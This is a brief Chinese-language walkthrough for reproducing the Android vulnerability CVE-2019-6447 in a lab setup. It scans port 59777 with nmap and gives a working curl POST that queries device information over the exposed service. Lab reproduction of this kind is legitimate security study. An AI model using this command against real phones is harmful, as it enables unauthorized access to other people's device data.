本文为的安卓漏洞 CVE-2019-6447 复现
用到的apk下载链接:
APK下载链接
注意一定要用此版本的apk,其他版本的apk可能不包含此漏洞。
1 首先打开kali 虚拟机,然后一台手机1开热点,另一台手机2安装apk,打开在app界面,查看手机2的ip地址。
2 用nmap命令 指定扫描59777端口 查看是否打开,
若打开则显示open字样。
3 接着直接执行下方的命令。
或者下载POC源码,下载POC执行所需的环境requirements。
执行攻击命令,完成攻击。
curl --header "Content-Type: application/json" --request POST --data "{\"command\":getDeviceInfo}" http://192.168.43.251:59777 -vvv
参考链接